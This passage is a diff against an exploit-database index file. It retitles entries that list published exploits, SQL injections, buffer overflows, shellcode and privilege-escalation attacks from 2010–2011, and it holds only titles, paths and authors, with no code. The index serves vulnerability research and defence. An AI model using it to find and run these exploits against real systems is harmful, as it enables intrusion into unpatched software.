(functions.php) SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 @@ -12691,19 +12691,19 @@ id,file,description,date,author,platform,type,port 14452,platforms/linux/dos/14452.txt,"ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 -14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 +14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 14457,platforms/php/webapps/14457.txt,"DM Filemanager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,php,webapps,0 14458,platforms/php/webapps/14458.txt,"sNews - (index.php) SQL Injection",2010-07-24,MajoR,php,webapps,0 14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent XSS",2010-07-24,K053,php,webapps,0 -14461,platforms/asp/webapps/14461.txt,"AKY Blog SQL Injection",2010-07-24,v0calist,asp,webapps,0 +14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0 14462,platforms/php/webapps/14462.txt,"Joomla Ozio Gallery Component (com_oziogallery) - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla ITArmory Component (com_itarmory) - SQL Injection",2010-07-24,Craw,php,webapps,0 14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - (.m3u) Universal Buffer Overflow Exploit",2010-07-24,s-dz,windows,local,0 14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0 14466,platforms/php/webapps/14466.txt,"Joomla Component (com_joomdle) 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0 14467,platforms/php/webapps/14467.txt,"Joomla Component (com_youtube) - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0 -14469,platforms/php/webapps/14469.txt,"XAOS CMS SQL Injection",2010-07-25,H-SK33PY,php,webapps,0 +14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0 14470,platforms/php/webapps/14470.txt,"Ballettin Forum SQL Injection",2010-07-25,3v0,php,webapps,0 14471,platforms/php/webapps/14471.txt,"CMS Ignition SQL Injection Exploit",2010-07-25,neavorc,php,webapps,0 14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection",2010-07-25,"Salvatore Fresta",php,webapps,0 @@ -12882,7 +12882,7 @@ id,file,description,date,author,platform,type,port 14713,platforms/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 - Denial of Service",2010-08-23,41.w4r10r,windows,dos,0 14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 14716,platforms/php/webapps/14716.txt,"AneCMS /registre/next - SQL Injection",2010-08-23,Sweet,php,webapps,0 -14717,platforms/php/webapps/14717.txt,"LINK CMS SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0 +14717,platforms/php/webapps/14717.txt,"LINK CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0 14718,platforms/php/webapps/14718.txt,"Joomla Component (com_zoomportfolio) - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0 14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 @@ -12981,7 +12981,7 @@ id,file,description,date,author,platform,type,port 14843,platforms/windows/dos/14843.txt,"Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) - Local File Disclosure",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0 -14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 +14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass (0Day)",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 14852,platforms/windows/dos/14852.txt,"leadtools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 @@ -13020,7 +13020,7 @@ id,file,description,date,author,platform,type,port 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 -14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 SEH Buffer Overflow Crash Proof of Concept",2010-09-05,"Abhishek Lyall",windows,dos,0 +14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - SEH Buffer Overflow Crash Proof of Concept",2010-09-05,"Abhishek Lyall",windows,dos,0 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 - (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 @@ -13050,9 +13050,9 @@ id,file,description,date,author,platform,type,port 14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 - (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 -14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 +14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0 -14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 SEH Overflow Exploit",2010-09-09,"Abhishek Lyall",win_x86,local,0 +14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - SEH Overflow Exploit",2010-09-09,"Abhishek Lyall",win_x86,local,0 14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80 14964,platforms/php/webapps/14964.txt,"Joomla Component (com_jphone) - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0 @@ -13207,7 +13207,7 @@ id,file,description,date,author,platform,type,port 15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (Python)",2010-10-04,ZoRLu,asp,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 -15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0 +15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service",2010-10-02,m0ebiusc0de,ios,dos,0 @@ -13219,13 +13219,13 @@ id,file,description,date,author,platform,type,port 15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Pro SP3 (EN) 32-bit - Add new local administrator _secuid0_ shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps,0 -15205,platforms/php/webapps/15205.txt,"Aspect Ratio CMS Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps,0 +15205,platforms/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps,0 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' NULL Pointer Dereference Local Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps,0 15208,platforms/php/webapps/15208.txt,"CuteNews - (index.php?page) Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps,0 15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - (XSS/Blind SQL Injection) Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0 -15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0 +15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0 15213,platforms/asp/remote/15213.pl,"ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 15214,platforms/win_x86/dos/15214.py,"HP Data Protector Media Operations - NULL Pointer Dereference Remote DoS",2010-10-06,d0lc3,win_x86,dos,19813 15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) - Resource Exhaustion / Remote ftpd-anon (0Day)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0 @@ -13239,7 +13239,7 @@ id,file,description,date,author,platform,type,port 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame Multiple SQL Injection",2010-10-09,KnocKout,php,webapps,0 15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 15225,platforms/php/webapps/15225.txt,"videodb 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 -15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 +15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 @@ -13247,7 +13247,7 @@ id,file,description,date,author,platform,type,port 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit",2010-11-21,"Mon7rF .",php,webapps,0 15594,platforms/php/webapps/15594.txt,"AuraCMS - (pfd.php) SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 -15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 file download",2010-11-22,Beach,jsp,webapps,0 +15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - file download",2010-11-22,Beach,jsp,webapps,0 15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - (fckeditor) Shell Upload",2010-11-22,Net.Edit0r,asp,webapps,0 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - (.m3u8) Buffer Overflow",2010-11-23,anT!-Tr0J4n,windows,dos,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow",2010-11-23,0v3r,windows,local,0 @@ -13262,7 +13262,7 @@ id,file,description,date,author,platform,type,port 15233,platforms/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",php,webapps,0 15234,platforms/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure",2010-10-11,"John Leitch",php,webapps,0 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0 -15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 +15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15607,platforms/php/webapps/15607.txt,"WSN Links - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps,0 15237,platforms/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta Release - Remote File Inclusion (Metasploit)",2010-10-12,v3n0m,php,webapps,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 @@ -13318,7 +13318,7 @@ id,file,description,date,author,platform,type,port 15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0 15305,platforms/windows/dos/15305.pl,"RarmaRadio 2.53.1 - (.m3u) Denial of Service",2010-10-23,anT!-Tr0J4n,windows,dos,0 15306,platforms/win_x86/dos/15306.pl,"AnyDVD 6.7.1.0 - Denial of Service",2010-10-23,Havok,win_x86,dos,0 -15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 Persistent XSS",2010-10-24,"Th3 RDX",php,webapps,0 +15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 - Persistent XSS",2010-10-24,"Th3 RDX",php,webapps,0 15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection",2010-10-24,ZonTa,php,webapps,0 15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0 15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0 @@ -13336,7 +13336,7 @@ id,file,description,date,author,platform,type,port 15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15325,platforms/php/webapps/15325.txt,"MyBB 1.6 - Full Path Disclosure",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15326,platforms/php/webapps/15326.txt,"BloofoxCMS 0.3.5 - Information Disclosure",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15327,platforms/php/webapps/15327.txt,"Energine CMS SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15327,platforms/php/webapps/15327.txt,"Energine CMS - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15328,platforms/php/webapps/15328.txt,"BloofoxCMS Registration Plugin SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15329,platforms/php/webapps/15329.txt,"Zomplog 3.9 - CSRF",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15330,platforms/php/webapps/15330.txt,"NinkoBB 1.3RC5 - XSS",2010-10-27,"High-Tech Bridge SA",php,webapps,0 @@ -13357,7 +13357,7 @@ id,file,description,date,author,platform,type,port 15345,platforms/php/webapps/15345.txt,"TFTgallery 0.13.1 - Local File Inclusion",2010-10-28,Havok,php,webapps,0 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 -15348,platforms/php/webapps/15348.txt,"Pub-Me CMS Blind SQL Injection",2010-10-28,H4f,php,webapps,0 +15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Auth Directory Traversal",2010-10-29,chr1x,windows,remote,0 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 overview.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 @@ -13410,7 +13410,7 @@ id,file,description,date,author,platform,type,port 15413,platforms/php/webapps/15413.txt,"sweetrice CMS 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15414,platforms/php/webapps/15414.txt,"jaf CMS 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps,0 -15416,platforms/php/webapps/15416.txt,"JBI CMS SQL Injection",2010-11-04,Cru3l.b0y,php,webapps,0 +15416,platforms/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,php,webapps,0 15417,platforms/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release - Buffer Overflow",2010-11-04,moigai,windows,local,0 15418,platforms/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption (0Day)",2010-11-04,Unknown,windows,dos,0 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption",2010-11-04,scup,windows,dos,0 @@ -13541,7 +13541,7 @@ id,file,description,date,author,platform,type,port 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos,0 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation",2010-11-20,LiquidWorm,windows,local,0 15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0 -16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection Vunerability",2011-02-01,Luchador,php,webapps,0 +16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps,0 15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0Day)",2010-11-20,webDEViL,windows,local,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 @@ -13563,7 +13563,7 @@ id,file,description,date,author,platform,type,port 15626,platforms/windows/local/15626.py,"OTSTurntables 1.00.048 - (m3u/ofl) Local BoF Exploit (SEH)",2010-11-28,0v3r,windows,local,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,asp,webapps,0 15628,platforms/windows/dos/15628.py,"Hanso Player 1.4.0 - (.m3u) Denial of Service",2010-11-28,anT!-Tr0J4n,windows,dos,0 -15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 +15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - search.asp / showAlllistings.asp SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Buffer Overflow Exploit (SEH)",2010-11-29,0v3r,windows,local,0 15631,platforms/hardware/remote/15631.txt,"HP LaserJet Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote,0 15632,platforms/windows/dos/15632.py,"FoxPlayer 2.4.0 - Denial of Service",2010-11-29,"Oh Yaw Theng",windows,dos,0 @@ -13577,7 +13577,7 @@ id,file,description,date,author,platform,type,port 15641,platforms/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 15642,platforms/php/webapps/15642.txt,"Pandora Fms 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15643,platforms/php/webapps/15643.txt,"Pandora Fms 3.1 Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15643,platforms/php/webapps/15643.txt,"Pandora Fms 3.1 - Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 15644,platforms/php/webapps/15644.txt,"Eclime 1.1.2b - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15645,platforms/php/webapps/15645.txt,"enano CMS 1.1.7pl1 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -13599,14 +13599,14 @@ id,file,description,date,author,platform,type,port 15663,platforms/windows/local/15663.py,"MediaCoder 0.7.5.4797 - (.m3u) Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - (travelbycountry.asp) SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0 -15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0 +15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0 15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 15669,platforms/windows/dos/15669.py,"Mediamonkey 3.2.4.1304 - (mp3) Buffer Overflow PoC",2010-12-04,0v3r,windows,dos,0 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service PoC",2010-12-04,h1ch4m,windows,dos,0 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service PoC",2010-12-04,h1ch4m,windows,dos,0 15673,platforms/asp/webapps/15673.txt,"Dejcom Market CMS - (showbrand.aspx) SQL Injection",2010-12-04,Mormoroth,asp,webapps,0 15674,platforms/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - DoS (Metasploit)",2010-12-04,"Vuk Ivanovic",windows,dos,0 -15675,platforms/hardware/webapps/15675.txt,"Multiple Linksys Router CSRF Vulnerabilities",2010-12-04,"Martin Barbella",hardware,webapps,0 +15675,platforms/hardware/webapps/15675.txt,"Multiple Linksys Router - CSRF Vulnerabilities",2010-12-04,"Martin Barbella",hardware,webapps,0 15676,platforms/multiple/dos/15676.txt,"Wireshark LDSS Dissector Buffer Overflow",2010-12-04,"Nephi Johnson",multiple,dos,0 15677,platforms/asp/webapps/15677.txt,"T-Dreams Cars Ads Package 2.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15678,platforms/asp/webapps/15678.txt,"T-Dreams Job Seekers Package 3.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 @@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port 15694,platforms/windows/dos/15694.txt,"Winzip 15.0 WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 15695,platforms/windows/dos/15695.txt,"Winzip 15.0 WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution Exploit",2010-12-06,Rew,windows,local,0 -15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 +15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 - Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0Day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 @@ -13795,7 +13795,7 @@ id,file,description,date,author,platform,type,port 15896,platforms/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0 15898,platforms/multiple/dos/15898.py,"Wireshark ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 -15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 Change Admin Passwd CSRF Exploit",2011-01-04,pentesters.ir,php,webapps,0 +15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Change Admin Passwd CSRF Exploit",2011-01-04,pentesters.ir,php,webapps,0 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player SEH BOF",2011-01-04,Acidgen,windows,local,0 15905,platforms/windows/dos/15905.py,"Xynph 1.0 USER Denial of Service",2011-01-04,freak_out,windows,dos,0 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 @@ -13842,7 +13842,7 @@ id,file,description,date,author,platform,type,port 15973,platforms/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 15974,platforms/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument - Local Privilege Escalation",2011-01-11,"Chris Howie",linux,dos,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0 -15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 +15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 - SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 HTTP Referer stored XSS",2011-01-12,"Saif El-Sherei",php,webapps,0 